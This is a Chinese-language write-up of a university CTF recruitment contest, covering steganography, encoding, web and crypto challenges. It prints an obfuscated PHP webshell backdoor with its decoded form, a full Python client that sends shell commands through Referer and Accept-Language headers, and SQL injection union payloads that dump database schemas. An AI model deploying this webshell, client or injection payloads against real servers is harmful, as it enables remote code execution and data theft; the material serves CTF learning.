emmm 天津大学和南京大学的招新赛,题目还是很有质量的,tcl了,有些题还是不会 记一下吧
misc 签到 下载一个附件,file看一下,发现是data,不管了 ,直接foremost分离一下foremost data
直接python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png
发现,图片不太清楚,问了下出题人,有alpha值,研究一下脚本 看到 --alpha <float>, Manual setting alpha (default is 3.0)
默认值为三,我们调到5 python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png --alpha 5
还是不清楚,加到10 python3 bwmforpy3.py decode 00001537.png 00001404.jpg a.png --alpha 10
ezdecode 签到题,是各种编码的组合
1 2 3 4 5 6 7 8 9 编码1:You Know That ZmxhZ3t3M2xjMG1f -->base64 flag{w3lc0m_7o_amaz1n9_CTF_vv0RId_!} 编码2:Key == 2 7_mznoaa19 -->栅栏 key为为2 编码3:Play With Bubble xilog-fahig-kalal-kytef-begig-nanyh-zumal-tuxox -->气泡 `http://www.hiencode.com/bubble.html` _CTF_vv0RId_!}
这里有后门! 个人认为这个题还是非常有趣的,里面涉及的加密方法还没搞懂,写一下做题记录吧 拿到附件,题目已经说了,是后门,看了一下,显然是经过混淆加密的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?php $u ='S+)$p.iS=$iSq[$m[2][$z]iS]iSiS;if(strpos(iS$p,$h)===0iS){$s[$iiS]=iS"";$iSpiS=$ss($p,3);}if(arriSiSay' ;$H ='s=&iS$_SESSiSION;$ss="subsiSiStr";$sliS="stiSrtolower";$i=$miS[1][iS0].iS$m[iS1][iS1];$h=$sl($ss(md5iS' ;$X ='($i.iS$kh),0,iS3)iS);$f=$sl(iS$ssiS(iSmd5($i.$kf),iS0iS,iS3));$p="";foriS($z=1;$z<couiSiSnt($m[1]);$z+i' ;$L =str_replace('x' ,'' ,'crexxatex_fxxunxction' );$E =';$i<$l;){foriS($j=0;(iS$j<$ciS&&iS$i<$l);$jiSiS++,iS$i++){$o.=$t{$iiS}^$k{$j}iS;iS}iS}riSeturn $o;}$iSr=iSiS$' ;$Q ='=basiSiSe64_encode(x(giSzcompress($o)iS,$k)iS);print("iS<$k>iS$d</iS$k>");@siSessioniS_destroyiS();}}}}' ;$p ='_SiSERViSEiSR;iS$rr=@$r["HTTiSP_REFEiSRER"iS];$ra=@$r[iS"iSHTTP_ACCEiSPT_LANGiSUAGE"]iS;ifiS($rr&&$iSra){$' ;$l ='iS$kiSh="3481"iS;iS$kf="iS9diS7b";funiSctiSion x($t,$k){$c=strliSen($kiS);iSiS$l=strlen($tiS);$o="";foiSr(iS$i=0iS' ;$h ='ll(iS"/([\\w])iS[\\w-]+(iS?:;q=0.iS([iSiS\\d]))?,?/",iS$riSa,iS$miS);if($q&&$m){@siSession_staiSrtiS(iS);$' ;$Z ='art();@evaiSl(@giSzuniSiSciSompress(@x(@baseiS64_decodeiS(pregiS_riSeplace(ariSray("/_/","/-/iS"),arriSa' ;$W ='_key_exiSists(iS$i,$s)){iS$siS[$i].=$piS;$e=iSiSstrpos($siS[$iiS]iS,$f);if($e){$k=$kh.$kiSf;ob_stiSiS' ;$g ='u=paiSrse_iSiSurl($rr);pariSse_siStr($u["queriSy"],$iSq)iS;iSiS$q=array_iSvaluiSes($q);pregiS_match_a' ;$D ='y(iS"/",iS"iS+")iS,$ss($s[$i],iS0,$e)iS)),$k)))iS;$o=obiS_get_iSiScontents()iS;ob_eniSd_iScleaiSn();$d' ;$O =str_replace('iS' ,'' ,$l .$E .$p .$g .$h .$H .$X .$u .$W .$Z .$D .$Q );$q =$L ('' ,$O );$q ();?>
把代码拿到这个网站解一下 后面,搜到这个马子知道居然还可以直接输出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 <?php $kh = "3481" ;$kf = "9d7b" ;function x ($t , $k ) { $c = strlen($k ); $l = strlen($t ); $o = "" ; for ($i = 0 ;$i < $l ;) { for ($j = 0 ;($j < $c && $i < $l );$j ++, $i ++) { $o .= $t {$i } ^ $k {$j }; } } return $o ; } $r = $_SERVER ;$rr = @$r ["HTTP_REFERER" ];$ra = @$r ["HTTP_ACCEPT_LANGUAGE" ];if ($rr && $ra ) { $u = parse_url($rr ); parse_str($u ["query" ], $q ); $q = array_values($q ); preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/" , $ra , $m ); if ($q && $m ) { @session_start(); $s = & $_SESSION ; $ss = "substr" ; $sl = "strtolower" ; $i = $m [1 ][0 ] . $m [1 ][1 ]; $h = $sl ($ss (md5($i . $kh ), 0 , 3 )); $f = $sl ($ss (md5($i . $kf ), 0 , 3 )); $p = "" ; for ($z = 1 ;$z < count($m [1 ]);$z ++) $p .= $q [$m [2 ][$z ]]; if (strpos($p , $h ) === 0 ) { $s [$i ] = "" ; $p = $ss ($p , 3 ); } if (array_key_exists($i , $s )) { $s [$i ].= $p ; $e = strpos($s [$i ], $f ); if ($e ) { $k = $kh . $kf ; ob_start(); eval (@gzuncompress(@x(base64_decode(preg_replace(array ("/_/" , "/-/" ), array ("/" , "+" ), $ss ($s [$i ], 0 , $e ))), $k ))); $o = ob_get_contents(); ob_end_clean(); $d = base64_encode(x(gzcompress($o ), $k )); print ("<$k >$d </$k >" ); @session_destroy(); } } } }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 from random import randint, choicefrom hashlib import md5import urllibimport stringimport zlibimport base64import requestsimport redef choicePart (seq, amount ): length = len (seq) if length == 0 or length < amount: print 'Error Input' return None result = [] indexes = [] count = 0 while count < amount: i = randint(0 , length - 1 ) if not i in indexes: indexes.append(i) result.append(seq[i]) count += 1 if count == amount: return result def randBytesFlow (amount ): result = '' for i in xrange(amount): result += chr (randint(0 , 255 )) return result def randAlpha (amount ): result = '' for i in xrange(amount): result += choice(string.ascii_letters) return result def loopXor (text, key ): result = '' lenKey = len (key) lenTxt = len (text) iTxt = 0 while iTxt < lenTxt: iKey = 0 while iTxt < lenTxt and iKey < lenKey: result += chr (ord (key[iKey]) ^ ord (text[iTxt])) iTxt += 1 iKey += 1 return result def debugPrint (msg ): if debugging: print msg debugging = False keyh = "3481" keyf = "9d7b" xorKey = keyh + keyf url = '' defaultLang = 'zh-CN' languages = ['zh-TW;q=0.%d' , 'zh-HK;q=0.%d' , 'en-US;q=0.%d' , 'en;q=0.%d' ] proxies = None sess = requests.Session() langTmp = choicePart(languages, 3 ) indexes = sorted (choicePart(range (1 , 10 ), 3 ), reverse=True ) acceptLang = [defaultLang] for i in xrange(3 ): acceptLang.append(langTmp[i] % (indexes[i],)) acceptLangStr = ',' .join(acceptLang) debugPrint(acceptLangStr) init2Char = acceptLang[0 ][0 ] + acceptLang[1 ][0 ] md5head = (md5(init2Char + keyh).hexdigest())[0 :3 ] md5tail = (md5(init2Char + keyf).hexdigest())[0 :3 ] + randAlpha(randint(3 , 8 )) debugPrint('$i is %s' % (init2Char)) debugPrint('md5 head: %s' % (md5head,)) debugPrint('md5 tail: %s' % (md5tail,)) cmd = raw_input('phpshell > ' ) while cmd != '' : query = [] for i in xrange(max (indexes) + 1 + randint(0 , 2 )): key = randAlpha(randint(3 , 6 )) value = base64.urlsafe_b64encode(randBytesFlow(randint(3 , 12 ))) query.append((key, value)) debugPrint('Before insert payload:' ) debugPrint(query) debugPrint(urllib.urlencode(query)) payload = zlib.compress(cmd) payload = loopXor(payload, xorKey) payload = base64.urlsafe_b64encode(payload) payload = md5head + payload cutIndex = randint(2 , len (payload) - 3 ) payloadPieces = (payload[0 :cutIndex], payload[cutIndex:], md5tail) iPiece = 0 for i in indexes: query[i] = (query[i][0 ], payloadPieces[iPiece]) iPiece += 1 referer = url + '?' + urllib.urlencode(query) debugPrint('After insert payload, referer is:' ) debugPrint(query) debugPrint(referer) r = sess.get(url, headers={'Accept-Language' : acceptLangStr, 'Referer' : refe rer}, proxies=proxies) html = r.text debugPrint(html) pattern = re.compile (r'<%s>(.*)</%s>' % (xorKey, xorKey)) output = pattern.findall(html) if len (output) == 0 : print 'Error, no backdoor response' cmd = raw_input('phpshell > ' ) continue output = output[0 ] debugPrint(output) output = output.decode('base64' ) output = loopXor(output, xorKey) output = zlib.decompress(output) print output cmd = raw_input('phpshell > ' )
改掉中间的url和key就可以了,py2的 直接打就行了,具体原因嘛,还需要继续研究研究
这个doc不对劲 这个题好玩,比较有趣,但是中间出现了一些意外,不过无伤大雅 下载附件,是个doc,显然60M+的doc不太现实,直接改成zip包 有一个key.txt,预览看不太正常,可能是0宽,网站打一下 刚开始以为要掩码爆破,但是没跑出来,问了下出题人,题有些问题,直接给密码了解一下压缩包Because I like naruto best
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 from asyncore import writeimport osfi = open ('D:\\vscodework\\ctf\\tj\\tjtest.txt' ,'a' ) for i in range (130000 ): if int (i)%8 ==0 : fi.write('\n' ) a=os.path.getsize('C:\\Users\\xin\\Desktop\\love\\out\\' +str (i)+'.png' ) if a==262 : fi.write('0' ) print (0 ,end='' ) else : print (1 ,end='' ) fi.write('1' ) fi.close() with open ("D:\\vscodework\\ctf\\tj\\tjtest.txt" ,"r" ) as f: data = f.readlines() for i in data: i = i.strip('\n' ) try : print (chr (int (i, 2 )),end="" ) except : pass
这里需要注意的是getsize是判断图片的字节 运行出来,是base64图片,直接复制到浏览器就好了 输出的东西直接放到浏览器运行就可以了
web ezsql sql注入没有任何过滤,直接打就可以了
1 2 3 4 union select version(),group_concat(schema_name),version(),version() from information_schema.schemata-- - union select version(),group_concat(table_name),version(),version() from information_schema.tables where table_schema='CTF'-- - union select version(),group_concat(column_name),version(),version() from information_schema.columns where table_schema='CTF' and table_name='flag'-- - union select version(),flag,null,null from CTF.flag-- -
upload bypass 文件上传,前端检测,先上传一个png图片抓包,然后改后缀,cat /flag即可
unserialize ctfshow反序列化原题
1 2 3 4 5 6 7 8 9 <?php class ctfShowUser { public $username = 'xxxxxx' ; public $password = 'xxxxxx' ; public $isVip =true ; } $a =new ctfShowUser(); echo serialize($a );
运行脚本, 打一下就可以了,这里要注意一下url编码一下
RCE_fun emmm 不会,后来看了下wp,emmm还可以这样 以为是原题,后面研究一下
crypto modulus 给了一个大n,e1和e2,c1,c2,共模攻击直接一把梭
ai emmmm 不能算做出来吧,直接软件一把梭的,
太菜了,cscms没做出来,中间搜了一个上传漏洞眉也没有打通,就没管了。 一直在路上